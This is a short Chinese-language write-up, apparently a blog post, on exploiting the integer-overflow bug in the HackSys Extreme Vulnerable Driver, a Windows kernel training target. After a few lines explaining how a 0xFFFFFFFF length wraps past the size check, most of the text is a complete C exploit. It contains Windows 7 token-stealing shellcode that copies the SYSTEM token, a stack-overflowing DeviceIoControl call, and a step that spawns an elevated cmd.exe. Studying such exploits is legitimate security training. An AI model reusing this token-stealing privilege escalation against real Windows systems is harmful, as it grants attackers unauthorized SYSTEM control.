整數溢出 在 CTF的pwn 裏面很常見===
這東西確實 怎麼說呢 道理就很淺顯===
整數的範圍就那麼大 如果超過了就可能造成漏洞
先來看一下 HEVD的 源碼
可以看到 危險版本 和安全的版本的區別==
其中這個 TerminatorSize 的 賦值的地方
這裏就是 4 那麼 如果我們的值 0xfffffffc~0xffffffff 就等於了 0 -3
那麼 就繞過了檢查==
exp 的話== 就很簡單了
然後我這裏的ebp 距離和 exp 上面的有所不同 然後 用ida可以看的出來
成功執行shellcode 並且成功拿到權限
這裏是繞過的exp
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<vector>
#include<iostream>
#include<time.h>
#include "windows.h"
using namespace std;
typedef void(*FunctionPointer) ();
VOID shellcode() {
__asm {
pushad; Save registers state
; Start of Token Stealing Stub
xor eax, eax; Set ZERO
mov eax, fs:[eax + 124h]; Get nt!_KPCR.PcrbData.CurrentThread
; _KTHREAD is located at FS : [0x124]
mov eax, [eax + 050h]; Get nt!_KTHREAD.ApcState.Process
mov ecx, eax; Copy current process _EPROCESS structure
mov edx, 4; WIN 7 SP1 SYSTEM process PID = 0x4
SearchSystemPID:
mov eax, [eax + 0b8h]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, 0b8h
cmp[eax + 0b4h], edx; Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov edx, [eax + 0f8h]; Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + 0f8h], edx; Replace target process nt!_EPROCESS.Token
; with SYSTEM process nt!_EPROCESS.Token
; End of Token Stealing Stub
popad; Restore registers state
; Kernel Recovery Stub
xor eax, eax; Set NTSTATUS SUCCEESS
add esp, 12; Fix the stack
pop ebp; Restore saved EBP
ret 8; Return cleanly
}
}
static VOID Cmd()
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
int main()
{
CHAR buffer[0x830];
HANDLE hDevice=NULL;
DWORD bReturn = 0;
__try
{
hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL) {
printf("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
memset(buffer, 'A', 0x830);
*(PDWORD)(buffer + 0x824) = (DWORD)&shellcode;
*(PDWORD)(buffer + 0x828) = 0xBAD0B0B0;
DeviceIoControl(hDevice,
0x222027,
(LPVOID)buffer,
(DWORD)0xFFFFFFFF,
NULL,
0,
&bReturn,
NULL);
Cmd();
}
__except (EXCEPTION_EXECUTE_HANDLER) {
printf("\t\t[-] Exception: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
return 0;
}